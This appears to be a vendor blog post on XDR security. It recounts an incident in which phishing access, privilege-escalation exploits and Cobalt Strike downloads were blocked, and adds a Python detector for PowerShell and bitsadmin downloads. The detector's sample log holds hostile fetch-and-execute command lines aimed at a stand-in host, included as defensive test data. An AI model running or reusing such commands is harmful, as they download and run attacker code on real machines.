The community of security experts bears more responsibility today than ever before. The dramatic increase in cyber attacks using ransomware and phishing calls for dynamic security strategies. Key here is the ability to recognise threats at an early stage and react immediately. With their centralised collection and AI-supported, behaviour-based analysis of data, XDR technologies offer a holistic solution. In this part you will learn how XDR works as an AI-supported technology, how it protects the most common attack vectors 24/7 and actively supports your Security Operation Center (SOC) from “detection” to “response” – vividly illustrated by a concrete IR case.
The Swiss Federal Office for Cybersecurity (BACS) has once again highlighted the dramatic increase in cyber attacks such as phishing and compromised user accounts. Regardless of company size and sector, Security Operation Centers (SOC) are required to identify security gaps in the IT infrastructure, offer comprehensive system protection and detect threats at an early stage. But that’s not all: with the rapid pace of technological progress, there is also a growing need to respond quickly and effectively to suspicious activities and security incidents and to return compromised IT systems to normal operation as quickly as possible. This is an enormous challenge for humans to manage – but with technological support, it no longer feels like magic.
Extended detection and response (XDR) offers a comprehensive solution by recognising attacks in a company’s digital assets and coordinating response measures. XDR technology thus provides security experts with a holistic view of the security situation.
The essence of XDR is that by implementing this AI-supported technology, endpoints, network traffic and user behaviour can be analysed holistically. By combining various analysis techniques, XDR platforms can recognise threats at an early stage and initiate automated responses that block or at least contain potential attacks. Because XDR takes account of the fact that cyber attackers are increasingly using automation and AI technologies, it makes sense for the defence tool to use the same technological methods.
The holistic and self-learning nature of XDR enables security teams to understand and respond to any type of threat across different vectors. This capability relieves the burden on the company’s SOC while also increasing the effectiveness of cyber defence.
In view of the constantly growing and increasingly complex threat situation, we’re now able to successfully fend off a comparatively high proportion of incidents thanks to self-learning, high-performance endpoint solutions such as managed detection and response (MDR) and extended detection and response (XDR).
The figures speak for themselves: with a 65 percent year-on-year increase in incidents in 2023, customers in around 48 percent of cases found themselves in a compromised but undamaged state. This is due on the one hand to better IT visibility and on the other to the technical support provided by XDR solutions, which are effective in slowing down potential attacks.
For those affected, a cyberattack scenario is like a storm that threatens to plunge everything into chaos – dramatically and scarily! But even in this storm, the stages of the attack follow a clear, (almost) standardised pattern: an attack always starts with what is termed initial access – the critical entry point.
Below we analyse the three entry points at the greatest risk (labelled A1 to A5 in Figure 2):
Due to the high success rate of phishing, it makes sense to invest in awareness-raising measures:
1. Sharing passwords and/or two-factor authentication codes
2. Email attachments that contain malware
XDR offers excellent options for detecting and blocking malware infections on endpoints and responding in a targeted manner.
Let’s look at an example to examine the practical benefits of XDR. A company that manages the XDR stack internally was infiltrated by an attacker who deployed a successful phishing campaign to gain access to a user account. In this case, InfoGuard-CSIRT was tasked with performing a compromise assessment to retrospectively investigate the exact facts of the case.
Let’s have a look at the details of the incident together:
As the company had not implemented multi-factor authentication, the attacker could easily access the company’s virtual desktop infrastructure (VDI). On 24 February, the attacker attempted to use an exploit published in October 2021 to extend their privileges. The XDR technology successfully blocked this attempt. The attacker withdrew – for the time being!
About two-and-a-half months later, the attacker returned and attempted to download Cobalt Strike, an attack framework used for command-and-control activities. This attempt again failed thanks to XDR’s behaviour-based detection, which flagged the download of malicious files, and downloads via unusual channels such as PowerShell or bitsadmin, as suspicious activity and blocked them. Despite further attempts to get the malware onto the system, XDR successfully prevented them all.
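To make the detection described above concrete, here is an added example (not code from the original article, and not any vendor's product logic) of a minimal behaviour-based rule that flags downloads driven through PowerShell or bitsadmin in process-creation telemetry. The log lines, host names, user names and IP addresses are constructed for the example, and the key=value field layout is an assumption rather than a real agent schema.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """One process-creation record as an endpoint agent might report it (assumed schema)."""
    host: str
    user: str
    parent: str
    image: str
    cmdline: str


# Constructed process-creation telemetry (not real product output).
SAMPLE_LOG = [
    r'host=vdi-07 user=jdoe parent=explorer.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell -nop -w hidden -c IEX (iwr http://203.0.113.10/stage.ps1 -UseBasicParsing)"',
    r'host=vdi-07 user=jdoe parent=cmd.exe image=C:\Windows\System32\bitsadmin.exe cmdline="bitsadmin /transfer upd /download /priority high http://203.0.113.10/svc.exe C:\Users\Public\svc.exe"',
    r'host=vdi-03 user=mmuster parent=explorer.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell -NoProfile -Command Get-Service -Name Spooler"',
    r'host=vdi-07 user=jdoe parent=wscript.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell -nop -w hidden -enc BASE64_PAYLOAD_PLACEHOLDER"',
    r'host=fs-01 user=backup parent=services.exe image=C:\Windows\System32\svchost.exe cmdline="svchost.exe -k netsvcs"',
]

# key=value pairs; values are either double-quoted or run to the next whitespace.
FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Command-line indicators of a download being driven from a shell or a built-in transfer tool.
PS_DOWNLOAD = re.compile(
    r"(Invoke-WebRequest|iwr\s|DownloadString|DownloadFile|Net\.WebClient|Start-BitsTransfer)",
    re.IGNORECASE,
)
BITS_DOWNLOAD = re.compile(r"/(transfer|addfile)\b", re.IGNORECASE)
URL = re.compile(r"https?://\S+", re.IGNORECASE)
ENCODED = re.compile(r"-(e|ec|enc|encodedcommand)\s", re.IGNORECASE)


def parse_line(line: str) -> ProcessEvent:
    """Turn one key=value telemetry line into a ProcessEvent."""
    fields = {
        m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
        for m in FIELD.finditer(line)
    }
    return ProcessEvent(**fields)


def classify(ev: ProcessEvent) -> list:
    """Return the reasons this event looks like a suspicious download (empty list if benign)."""
    image = ev.image.lower().rsplit("\\", 1)[-1]
    reasons = []
    if image in ("powershell.exe", "pwsh.exe"):
        # A download cmdlet or .NET download call together with a URL on the command line.
        if PS_DOWNLOAD.search(ev.cmdline) and URL.search(ev.cmdline):
            reasons.append("powershell-download")
        # Encoded commands hide the payload from plain string matching; flag them separately.
        if ENCODED.search(ev.cmdline):
            reasons.append("powershell-encoded-command")
    elif image == "bitsadmin.exe":
        if BITS_DOWNLOAD.search(ev.cmdline) and URL.search(ev.cmdline):
            reasons.append("bitsadmin-download")
    return reasons


def scan(lines: list) -> list:
    """Parse every line and return only the events that trip a rule."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        reasons = classify(ev)
        if reasons:
            hits.append({
                "host": ev.host,
                "user": ev.user,
                "parent": ev.parent,
                "image": ev.image.rsplit("\\", 1)[-1],
                "reasons": reasons,
            })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Of the five constructed lines, three are flagged: the PowerShell download, the bitsadmin transfer and the encoded PowerShell command; the benign `Get-Service` call and the `svchost.exe` start pass. A real XDR rule would additionally weigh the parent process (a script host or Office process spawning PowerShell is more suspicious than an administrator's console) and the reputation of the destination, and would block rather than merely list the event.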
The attacker returned on 22 June, presumably with new ideas. After researching the web, they appear to have come across a blog article published in May describing a method of escalating privileges. The attacker ran the commands exactly as described in the article, even though the target company’s environment did not resemble the infrastructure described there. The XDR technology successfully blocked this attempt as well.
On 5 July, the attacker attempted to uninstall the security software Cortex XDR and failed thanks to tamper protection. On 16 July, they used an exploit that had only been published two days earlier. The XDR solution also recognised and blocked this attack. The attacker still refused to give up and returned the next day. Once again they tried to attack with Cobalt Strike – once again unsuccessfully!
The attacker was unable to cause any damage despite persistent attack attempts. It has to be said that the company was lucky: not only did the attacker behave in a relatively inexperienced manner, their activities were also spread out over a long timeline. Experience shows that attack attempts and successful intrusions are happening increasingly close together these days.
Without the XDR solution, the attack would have led to a successful ransomware compromise in February or March. After analysing and reconstructing the attack, our most urgent recommendation to the company was to implement multi-factor authentication to prevent future attacks.
This case illustrates how state-of-the-art, behaviour-based technologies such as the XDR solution successfully fend off potential attacks. At the same time, this example also emphasises the need for clear processes, established instructions and safety guidelines in order to be able to react appropriately to alerts.
Let’s examine the basic components and functionalities of XDR systems and their integration into the corporate infrastructure.
XDR systems can be sourced from various providers such as Microsoft, CrowdStrike and Palo Alto. A central element of this architecture is agent-based data acquisition. Agents fulfil two essential functions on the operating systems:
Various data sources need to be integrated to obtain a complete overview of the security situation:
The XDR console offers extensive analytical functions that are enhanced by the data collected:
Seamless embedding of XDR systems in your security strategy is a significant advantage for efficient cyber defence. This ensures that your Security Operation Center (SOC) is optimally positioned and meets the highest security standards 24/7.
Is your organisation focused on building a successful, centrally controllable cyber defence concept that supports your Security Operation Center (SOC) around the clock? You now know that you can hugely enhance the potential of your cyber defence with an XDR stack.
We’ll be happy to support you with planning and concrete implementation. Our “ISO 27001:2022”-certified security experts will advise you and help you determine the most suitable XDR product for your IT environment.
Our two-part blog series on “The Magic Word for Efficient Defence against Modern Cyber Attacks” gives you a complete 360-degree perspective:
Also for streaming: Ernesto Hartmann, Chief Cyber Defence Officer, and Sandro Bachmann, Senior Incident Responder, discussed how XDR can be used to effectively defend against cyber threats during an InfoGuard Security webcast.
The recording of this webcast is available as a YouTube video. It's well worth listening to!
Caption: AI generated image